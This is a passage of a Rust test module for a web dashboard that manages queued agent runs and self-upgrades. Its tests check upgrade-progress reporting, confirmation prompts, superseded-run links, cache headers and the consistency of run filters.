8896 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
8897
8898 let res = fx.post("/api/upgrade", None).await;
8904 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
8905 let body = res.json();
8906 assert!(body["to"].is_null(), "there was no release to move to");
8907 assert!(body["parked"].is_null(), "and nothing was parked");
8908 assert!(
8909 body["detail"]
8910 .as_str()
8911 .unwrap()
8912 .contains("nothing restarted"),
8913 "{body:?}"
8914 );
8915 }
8916
8917 #[tokio::test]
8918 async fn health_reports_the_running_version_and_no_pending_upgrade_by_default() {
8919 let repo = TempDir::new().expect("repo dir");
8924 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
8925 .expect("write magi.toml");
8926 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
8927
8928 let health = fx.get("/api/health").await.json();
8929 assert_eq!(health["version"], env!("CARGO_PKG_VERSION"));
8930 assert_eq!(
8931 health["update"]["available"], false,
8932 "checking is off, which reads as \"unknown\", not \"none\""
8933 );
8934 assert!(health["update"]["to"].is_null());
8935 assert!(
8936 health["upgrade"].is_null(),
8937 "nothing has ever asked this deck to upgrade"
8938 );
8939 }
8940
8941 #[tokio::test]
8942 async fn health_reports_a_parked_upgrade_and_what_it_is_waiting_on() {
8943 let fx = Fixture::start().await;
8944 write_run(&fx.runs(), "20260905-000000-cd51", RunStatus::Implementing);
8945
8946 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
8947 progress.parked_run = Some("20260905-000000-cd51".to_owned());
8948 progress.advance(crate::updater::Stage::Parking);
8949 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
8950
8951 let health = fx.get("/api/health").await.json();
8952 assert_eq!(health["upgrade"]["stage"], "parking");
8953 assert_eq!(health["upgrade"]["from"], "0.5.1");
8954 assert_eq!(health["upgrade"]["to"], "0.5.2");
8955 let waiting_on = health["upgrade"]["waiting_on"]
8956 .as_str()
8957 .expect("waiting_on is set while parking a known run");
8958 assert!(waiting_on.contains("cd51"), "{waiting_on}");
8959 assert!(waiting_on.contains("implementing"), "{waiting_on}");
8960 }
8961
8962 #[tokio::test]
8963 async fn health_reports_a_finished_upgrade_with_no_waiting_on() {
8964 let fx = Fixture::start().await;
8965 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
8966 progress.advance(crate::updater::Stage::Done);
8967 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
8968
8969 let health = fx.get("/api/health").await.json();
8970 assert_eq!(health["upgrade"]["stage"], "done");
8971 assert!(
8972 health["upgrade"]["waiting_on"].is_null(),
8973 "nothing to wait on once it is done"
8974 );
8975 }
8976
8977 #[tokio::test]
8978 async fn hand_over_advances_the_upgrade_progress_through_parking_and_restarting() {
8979 let home = TempDir::new().expect("temp home");
8980 let runs = home.path().join("runs");
8981 std::fs::create_dir_all(&runs).expect("runs dir");
8982 let ui = Ui::new(
8983 Queue::at(home.path().join("queue")),
8984 Questions::at(home.path().join("questions")),
8985 Talks::at(home.path().join("talks")),
8986 runs,
8987 home.path().to_path_buf(),
8988 PathBuf::from("/repo/magi"),
8989 )
8990 .with_launch(launch_idle);
8991 let looping = ui.looping();
8992 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
8993 .await
8994 .expect("bind loopback");
8995 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
8996
8997 let progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
8998 crate::updater::write_progress(home.path(), &progress).expect("seed progress");
8999
9000 hand_over(home.path(), &looping, served, || Ok(()))
9001 .await
9002 .expect("hand over");
9003
9004 let after = crate::updater::read_progress(home.path()).expect("progress on disk");
9005 assert_eq!(
9006 after.stage,
9007 crate::updater::Stage::Restarting,
9008 "hand_over owns the record through parking and up to restarting; \
9009 the successor is what finishes it"
9010 );
9011 }
9012
9013 #[test]
9014 fn the_upgrade_button_arms_before_it_restarts_anything() {
9015 assert!(APP_JS.contains("upgrade: \"/api/upgrade\""));
9018 assert!(APP_JS.contains("Replace the binary and restart?"));
9019 assert!(APP_JS.contains("function confirmed("));
9020 assert!(APP_JS.contains("show(upgradeBtn, !foreign && update.available)"));
9025 assert!(
9029 APP_JS.contains("Parking, then restarting"),
9030 "the button says what it is waiting for"
9031 );
9032 assert!(APP_JS.contains("if (!out.to)"));
9035 }
9036
9037 #[test]
9038 fn stopping_the_loop_arms_but_starting_does_not() {
9039 assert!(APP_JS.contains("Finish the run(s) in flight, then stop claiming?"));
9042 assert!(APP_JS.contains("Stop claiming new tasks? Nothing is in flight."));
9043 assert!(APP_JS.contains("confirmed(button, question)"));
9044 assert!(!APP_JS.contains("setText(btn, \"Update & restart\");\n }\n }, 6000)"));
9047 assert!(APP_JS.contains("const label = btn.textContent;"));
9048 assert!(!APP_JS.contains("Neither direction is guarded"));
9049 }
9050
9051 #[test]
9052 fn the_running_version_is_shown_regardless_of_whether_an_update_exists() {
9053 assert!(
9054 APP_JS.contains("state.health.version"),
9055 "the operator wants to know what is running even with nothing newer"
9056 );
9057 assert!(APP_JS.contains("id=\"daemon-version\"") || APP_CSS.contains(".daemon-version"));
9058 }
9059
9060 #[test]
9061 fn the_upgrade_button_names_its_destination() {
9062 assert!(
9063 APP_JS.contains("`Update to ${update.to}`"),
9064 "pressing the button should not be a surprise about what it moves to"
9065 );
9066 }
9067
9068 #[test]
9069 fn an_upgrade_in_progress_is_shown_as_stages_not_as_an_error() {
9070 for stage in ["downloading", "replaced", "parking", "restarting"] {
9071 assert!(
9072 APP_JS.contains(&format!("\"{stage}\"")),
9073 "the phone must be able to tell {stage} apart from the others"
9074 );
9075 }
9076 assert!(APP_JS.contains(".waiting_on"));
9077 assert!(APP_JS.contains("function reportUnreachableDuringUpgrade("));
9082 assert!(APP_JS.contains("reconnects on its own"));
9083 }
9084
9085 #[test]
9086 fn a_failed_upgrade_does_not_lock_the_loop_controls() {
9087 let body = &APP_JS[APP_JS.find("function renderLoop(").expect("renderLoop")
9096 ..APP_JS.find("function upgrade(").expect("upgrade")];
9097 assert!(
9098 !body.contains(
9099 "upgradeStage === \"failed\") {\n setAttr(box, \"data-state\", \"failed\")"
9100 ),
9101 "a failed upgrade must not take the whole strip over the way it used to"
9102 );
9103 assert!(
9104 body.contains("upgradeFailNote"),
9105 "the failure has to reach the loop's own note instead"
9106 );
9107 assert_eq!(
9111 body.matches("upgradeFailNote].filter(Boolean).join")
9112 .count(),
9113 2,
9114 "both loop-why writers (quiet and control) must fold the note in"
9115 );
9116 }
9117
9118 #[test]
9119 fn an_overdue_upgrade_eventually_asks_for_a_human() {
9120 assert!(APP_JS.contains("UPGRADE_WAIT_LIMIT_MS = 70 * 60 * 1000"));
9123 assert!(APP_JS.contains("function upgradeOverdue("));
9124 }
9125
9126 #[test]
9127 fn coming_back_from_an_upgrade_says_which_version_it_landed_on() {
9128 assert!(
9129 APP_JS.contains("Updated to ${upgradeInfo.to"),
9130 "the operator who asked for the restart wants to know it worked"
9131 );
9132 }
9133
9134 #[test]
9135 fn an_error_is_visible_from_where_the_button_is() {
9136 let alert = &APP_CSS[APP_CSS.find(".alert {").expect(".alert")
9141 ..APP_CSS.find(".alert-text").expect(".alert-text")];
9142 assert!(
9143 alert.contains("position: fixed"),
9144 "an error about the thing under your thumb has to be visible from \
9145 where your thumb is: {alert}"
9146 );
9147 assert!(
9148 alert.contains("z-index: 25"),
9149 "above the dock (20) and the run-actions FAB (15), so neither \
9150 buries it: {alert}"
9151 );
9152 assert!(
9153 alert.contains("var(--tap)"),
9154 "and clear of the dock and the home indicator: {alert}"
9155 );
9156 assert!(
9159 alert.contains("var(--s4) + var(--tap) + var(--s3)"),
9160 "the FAB's column stays free: {alert}"
9161 );
9162 }
9163
9164 #[tokio::test]
9165 async fn an_older_attempt_says_what_replaced_it() {
9166 let fx = Fixture::start().await;
9167 let q = fx.queue();
9168 let runs = fx.runs();
9169 let (first, second) = ("20260901-000000-aaaa", "20260901-000000-bbbb");
9170 write_run(&runs, first, RunStatus::Stalled);
9171 write_run(&runs, second, RunStatus::Blocked);
9172
9173 let mut t = Task::new(
9174 "one task".to_owned(),
9175 "do it".to_owned(),
9176 PathBuf::from("/repo"),
9177 Source::Human,
9178 );
9179 t.runs = vec![first.to_owned(), second.to_owned()];
9180 q.put(&mut t).expect("put");
9181
9182 let rows = fx.get("/api/runs").await.json();
9186 let by = |short: &str| -> Value {
9187 rows.as_array()
9188 .unwrap()
9189 .iter()
9190 .find(|r| r["short"] == short)
9191 .cloned()
9192 .unwrap_or(Value::Null)
9193 };
9194 assert_eq!(by("aaaa")["superseded_by"], "bbbb");
9195 assert!(
9196 by("bbbb")["superseded_by"].is_null(),
9197 "the latest attempt is not superseded by anything"
9198 );
9199 assert!(APP_JS.contains("run.superseded_by"));
9201 assert!(APP_JS.contains("Superseded by"));
9202 }
9203
9204 #[tokio::test]
9205 async fn a_run_s_own_detail_page_says_what_replaced_it_too() {
9206 let fx = Fixture::start().await;
9211 let q = fx.queue();
9212 let runs = fx.runs();
9213 let (first, second) = ("20260901-000000-cccc", "20260901-000000-dddd");
9214 write_run(&runs, first, RunStatus::Blocked);
9215 write_run(&runs, second, RunStatus::Merged);
9216
9217 let mut t = Task::new(
9218 "one task".to_owned(),
9219 "do it".to_owned(),
9220 PathBuf::from("/repo"),
9221 Source::Human,
9222 );
9223 t.runs = vec![first.to_owned(), second.to_owned()];
9224 q.put(&mut t).expect("put");
9225
9226 let earlier = fx.get(&format!("/api/runs/{first}")).await.json();
9227 assert_eq!(earlier["superseded_by"], "dddd");
9228 assert_eq!(earlier["latest_attempt"]["id"], second);
9229 assert_eq!(earlier["latest_attempt"]["short"], "dddd");
9230 assert_eq!(
9231 earlier["latest_attempt"]["resolved"], true,
9232 "the run that replaced it landed, so this one reads as settled"
9233 );
9234
9235 let later = fx.get(&format!("/api/runs/{second}")).await.json();
9236 assert!(
9237 later["superseded_by"].is_null(),
9238 "the latest attempt is not superseded by anything"
9239 );
9240 assert!(
9241 later["latest_attempt"].is_null(),
9242 "the latest attempt has no later attempt of its own"
9243 );
9244
9245 assert!(APP_JS.contains("run.latest_attempt"));
9252 assert!(APP_JS.contains("data-superseded"));
9253 assert!(APP_JS.contains("#/runs/${latest.id}"));
9254 }
9255
9256 #[tokio::test]
9257 async fn a_chain_of_retries_points_the_oldest_at_the_current_head() {
9258 let fx = Fixture::start().await;
9264 let q = fx.queue();
9265 let runs = fx.runs();
9266 let (a, b, c) = (
9267 "20260901-000000-aaaa",
9268 "20260901-000000-bbbb",
9269 "20260901-000000-cccc",
9270 );
9271 write_run(&runs, a, RunStatus::Blocked);
9272 write_run(&runs, b, RunStatus::Blocked);
9273 write_run(&runs, c, RunStatus::Merged);
9274
9275 let mut t = Task::new(
9276 "retried twice".to_owned(),
9277 "do it".to_owned(),
9278 PathBuf::from("/repo"),
9279 Source::Human,
9280 );
9281 t.runs = vec![a.to_owned(), b.to_owned(), c.to_owned()];
9282 q.put(&mut t).expect("put");
9283
9284 let view = fx.get(&format!("/api/runs/{a}")).await.json();
9285 assert_eq!(view["superseded_by"], "bbbb", "the immediate successor");
9286 assert_eq!(
9287 view["latest_attempt"]["id"], c,
9288 "the chain's current head, not the intermediate Blocked retry"
9289 );
9290 assert_eq!(view["latest_attempt"]["resolved"], true);
9291
9292 let mid = fx.get(&format!("/api/runs/{b}")).await.json();
9293 assert_eq!(mid["latest_attempt"]["id"], c);
9294 assert_eq!(mid["latest_attempt"]["resolved"], true);
9295 }
9296
9297 #[tokio::test]
9298 async fn an_unresolved_or_unverified_successor_does_not_read_as_finished() {
9299 let fx = Fixture::start().await;
9300 let q = fx.queue();
9301 let runs = fx.runs();
9302
9303 let (still_blocked_a, still_blocked_b) = ("20260901-000000-e001", "20260901-000000-e002");
9306 write_run(&runs, still_blocked_a, RunStatus::Blocked);
9307 write_run(&runs, still_blocked_b, RunStatus::Blocked);
9308 let mut t1 = Task::new(
9309 "still stuck".to_owned(),
9310 "do it".to_owned(),
9311 PathBuf::from("/repo"),
9312 Source::Human,
9313 );
9314 t1.runs = vec![still_blocked_a.to_owned(), still_blocked_b.to_owned()];
9315 q.put(&mut t1).expect("put");
9316 let view1 = fx.get(&format!("/api/runs/{still_blocked_a}")).await.json();
9317 assert_eq!(view1["latest_attempt"]["resolved"], false);
9318
9319 let (noop_a, noop_b) = ("20260901-000000-e003", "20260901-000000-e004");
9324 write_run(&runs, noop_a, RunStatus::Blocked);
9325 write_run(&runs, noop_b, RunStatus::VerifiedNoop);
9326 let mut t2 = Task::new(
9327 "claims done".to_owned(),
9328 "do it".to_owned(),
9329 PathBuf::from("/repo"),
9330 Source::Human,
9331 );
9332 t2.runs = vec![noop_a.to_owned(), noop_b.to_owned()];
9333 q.put(&mut t2).expect("put");
9334 let view2 = fx.get(&format!("/api/runs/{noop_a}")).await.json();
9335 assert_eq!(
9336 view2["latest_attempt"]["resolved"], false,
9337 "an unverified no-op claim must not read as a confirmed finish"
9338 );
9339
9340 assert!(APP_JS.contains("latest.resolved"));
9343 }
9344
9345 #[tokio::test]
9346 async fn a_replaced_deck_is_not_served_from_a_phone_s_cache() {
9347 let fx = Fixture::start().await;
9348 let js = fx.get("/app.js").await;
9354 assert_eq!(js.status, 200);
9355 let tag = js
9356 .header("etag")
9357 .expect("an etag to revalidate against")
9358 .to_owned();
9359 assert!(tag.contains(env!("CARGO_PKG_VERSION")), "tag: {tag}");
9360 assert_eq!(
9361 js.header("cache-control"),
9362 Some("no-cache, must-revalidate"),
9363 "the phone has to ask every time"
9364 );
9365
9366 let again = fx
9369 .get_with("/app.js", &[("if-none-match", tag.as_str())])
9370 .await;
9371 assert_eq!(
9372 again.status, 304,
9373 "a deck it already has costs one round trip"
9374 );
9375 assert!(again.body.is_empty(), "304 carries no body");
9376
9377 let weak = fx
9380 .get_with("/app.js", &[("if-none-match", &format!("W/{tag}"))])
9381 .await;
9382 assert_eq!(weak.status, 304);
9383 let stale = fx
9384 .get_with("/app.js", &[("if-none-match", "\"0.0.1-1\"")])
9385 .await;
9386 assert_eq!(stale.status, 200, "an older build must be replaced");
9387 assert!(stale.body.contains("renderRunActions"));
9388 }
9389
9390 #[test]
9391 fn the_deck_never_sends_the_operator_to_a_terminal() {
9392 assert!(
9395 !APP_JS.contains("Run `magi fold` first"),
9396 "the deck must offer the fold, not prescribe a shell command"
9397 );
9398 assert!(APP_JS.contains("foldRun:"));
9399 assert!(APP_JS.contains("resumeRun:"));
9400 assert!(APP_JS.contains("renderRunActions"));
9401
9402 assert!(APP_JS.contains("armedFold"));
9404 assert!(APP_JS.contains("Yes, fold worktrees"));
9405
9406 assert!(APP_JS.contains("can no longer be resumed"));
9409 }
9410
9411 #[test]
9412 fn a_finished_run_explains_itself_with_its_own_last_line() {
9413 assert!(
9419 !APP_JS.contains("collapsed on agent quota"),
9420 "a stall must not be explained by a cause the deck did not check"
9421 );
9422 assert!(
9423 !APP_JS.contains("Review rounds ran out with findings still open, or the gate failed"),
9424 "and a block must not offer a guess with an `or` in it"
9425 );
9426
9427 assert!(
9431 APP_JS.contains("setText(r.event, run.event || \"\")"),
9432 "the run's last line is rendered unconditionally"
9433 );
9434 assert!(
9435 !APP_JS.contains("moving && run.event"),
9436 "and never gated on the run still moving"
9437 );
9438
9439 assert!(APP_JS.contains("lost to quota"));
9441 }
9442
9443 #[test]
9465 fn runs_tree_sections_and_state_chips_agree_on_what_a_run_can_be() {
9466 let shapes_marker = "const REPRESENTATIVE_RUN_SHAPES = [";
9467 let shapes_body_start =
9468 APP_JS.find(shapes_marker).expect("the shape list exists") + shapes_marker.len();
9469 let shapes_close = APP_JS[shapes_body_start..]
9470 .find("].map(")
9471 .expect("the shape list is closed by its done-computing .map(...)")
9472 + shapes_body_start;
9473 let shapes_src = &APP_JS[shapes_body_start..shapes_close];
9474
9475 let mut shapes: Vec<(bool, String, bool)> = Vec::new();
9476 for entry in shapes_src.split('{').skip(1) {
9477 let waiting = entry.contains("waiting: true");
9478 let dead = entry.contains("live: \"dead\"");
9479 let status_at =
9480 entry.find("status: \"").expect("each shape names a status") + "status: \"".len();
9481 let status_end = entry[status_at..]
9482 .find('"')
9483 .expect("the status string is closed")
9484 + status_at;
9485 shapes.push((waiting, entry[status_at..status_end].to_string(), dead));
9486 }
9487 assert!(shapes.len() >= 6, "parsed shapes: {shapes:?}");
9488
9489 let done_rule_marker = "done: !";
9493 let done_rule_at = APP_JS[shapes_close..]
9494 .find(done_rule_marker)
9495 .expect("the done rule follows the shape list")
9496 + shapes_close
9497 + done_rule_marker.len();
9498 let includes_at = APP_JS[done_rule_at..]
9499 .find(".includes(shape.status)")
9500 .expect("the done rule ends in .includes(shape.status)")
9501 + done_rule_at;
9502 let not_done: Vec<&str> = APP_JS[done_rule_at..includes_at]
9503 .trim()
9504 .trim_start_matches('[')
9505 .trim_end_matches(']')
9506 .split(',')
9507 .map(|s| s.trim().trim_matches('"'))
9508 .filter(|s| !s.is_empty())
9509 .collect();
9510
9511 let shapes: Vec<(bool, String, bool, bool)> = shapes
9512 .into_iter()
9513 .map(|(waiting, status, dead)| {
9514 let done = !not_done.contains(&status.as_str());
9515 (waiting, status, dead, done)
9516 })
9517 .collect();
9518
9519 fn run_section(waiting: bool, status: &str, dead: bool) -> &'static str {
9523 if waiting {
9524 return "waiting";
9525 }
9526 if dead
9527 && !matches!(
9528 status,
9529 "merged" | "ready" | "stalled" | "blocked" | "failed" | "verified_noop"
9530 )
9531 {
9532 return "stale";
9533 }
9534 match status {
9535 "merged" | "ready" => "landed",
9536 "stalled" | "blocked" | "failed" | "verified_noop" => "ended",
9537 _ => "flight",
9538 }
9539 }
9540
9541 fn filter_matches(filter_key: &str, waiting: bool, dead: bool, done: bool) -> bool {
9544 match filter_key {
9545 "active" => !done,
9546 "flight" => !done && !waiting && !dead,
9547 "stale" => !done && !waiting && dead,
9548 "waiting" => waiting,
9549 "done" => done,
9550 "all" => true,
9551 other => panic!("unknown RUN_STATE_FILTERS key: {other}"),
9552 }
9553 }
9554
9555 let compatible = |section: &str, filter_key: &str| {
9556 shapes.iter().any(|(waiting, status, dead, done)| {
9557 run_section(*waiting, status, *dead) == section
9558 && filter_matches(filter_key, *waiting, *dead, *done)
9559 })
9560 };
9561
9562 let expected = [
9567 ("waiting", [true, false, false, true, true, true]),
9568 ("stale", [true, false, true, false, false, true]),
9569 ("flight", [true, true, false, false, false, true]),
9570 ("landed", [false, false, false, false, true, true]),
9571 ("ended", [false, false, false, false, true, true]),
9572 ];
9573 let filter_keys = ["active", "flight", "stale", "waiting", "done", "all"];
9574
9575 for (section, wants) in expected {
9576 for (filter_key, want) in filter_keys.iter().zip(wants) {
9577 assert_eq!(
9578 compatible(section, filter_key),
9579 want,
9580 "section {section:?} x filter {filter_key:?} should be compatible: {want}"
9581 );
9582 }
9583 }
9584
9585 assert!(
9588 APP_JS.contains("function sectionCompatibleWithStateFilter(sectionKey, filterKey)")
9589 );
9590 assert!(APP_JS.contains(
9591 "if (state.runsFilter.section && !sectionCompatibleWithStateFilter(state.runsFilter.section, key))"
9592 ));
9593 assert!(APP_JS.contains(
9594 "if (!same && !sectionCompatibleWithStateFilter(section, state.runsStateFilter))"
9595 ));
9596 }
9597
9598 #[tokio::test]
9599 async fn normalize_default_repo_leaves_an_explicit_path_untouched() {
9600 let dir = tempfile::tempdir().expect("tempdir");
9604 let explicit = dir.path().join("not-a-checkout");
9605 std::fs::create_dir_all(&explicit).expect("create dir");
9606 assert_eq!(normalize_default_repo(explicit.clone()).await, explicit);
9607
9608 let missing = dir.path().join("does-not-exist-at-all");
9609 assert_eq!(normalize_default_repo(missing.clone()).await, missing);
9610 }
9611}